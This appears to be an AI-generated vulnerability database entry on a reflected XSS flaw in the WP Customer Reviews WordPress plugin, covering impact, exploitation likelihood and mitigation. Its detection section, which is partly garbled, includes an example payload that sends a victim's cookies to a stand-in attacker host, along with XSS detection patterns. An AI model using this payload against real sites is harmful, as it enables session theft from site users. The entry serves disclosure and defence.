
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-14452 is a Reflected Cross-Site Scripting (XSS) vulnerability in the WP Customer Reviews plugin for WordPress, affecting all versions up to and including 3.7.5. The flaw exists in the wpcr3_fname parameter due to insufficient input sanitization and output escaping, allowing unauthenticated attackers to inject arbitrary web scripts. It was published on February 19, 2026, and carries a CVSS v3.1 base score of 7.2 (High) (Red Hat CVE, Wordfence).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The wpcr3_fname parameter in the WP Customer Reviews plugin fails to properly sanitize user-supplied input before reflecting it in the HTTP response, enabling script injection. Exploitation requires social engineering — an attacker must trick a victim into clicking a crafted link containing the malicious payload, which then executes in the victim's browser context (Red Hat CVE, Infinitsec).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site. This can lead to session token theft, credential harvesting, defacement of page content visible to the victim, or redirection to malicious sites. While availability is not directly impacted, confidentiality and integrity are both at low-to-moderate risk, particularly for authenticated users such as administrators who may be targeted (Red Hat CVE).
No evidence of active in-the-wild exploitation or inclusion in CISA's Known Exploited Vulnerabilities (KEV) catalog has been reported. The EPSS score is approximately 0.078%, indicating a low probability of exploitation in the near term. No exploit kits or attributed threat actor campaigns have been identified. The vulnerability requires user interaction (victim clicking a crafted link), which limits opportunistic mass exploitation (Red Hat CVE, Wordfence).
wpcr3_fname parameter in the HTTP request.wpcr3_fname parameter, e.g., ?wpcr3_fname=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.wpcr3_fname parameter with encoded script tags or JavaScript event handlers (e.g., <script>, onerror=, javascript:).wpcr3_fname parameter, particularly those containing URL-encoded HTML or JavaScript.WordPress site administrators should update the WP Customer Reviews plugin to a version beyond 3.7.5 that includes a fix for this vulnerability. Until a patched version is available or applied, consider disabling the plugin entirely to eliminate the attack surface. Web application firewalls (WAFs) with XSS filtering rules can provide an interim layer of defense against exploitation attempts (Wordfence, Red Hat CVE).
Wordfence included CVE-2025-14452 in its weekly WordPress vulnerability report for the week of February 16–22, 2026, highlighting it as part of broader plugin security monitoring (Wordfence). RedPacket Security also published a CVE alert for this vulnerability (RedPacket Security). No significant broader media coverage or notable researcher commentary beyond routine vulnerability disclosure has been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."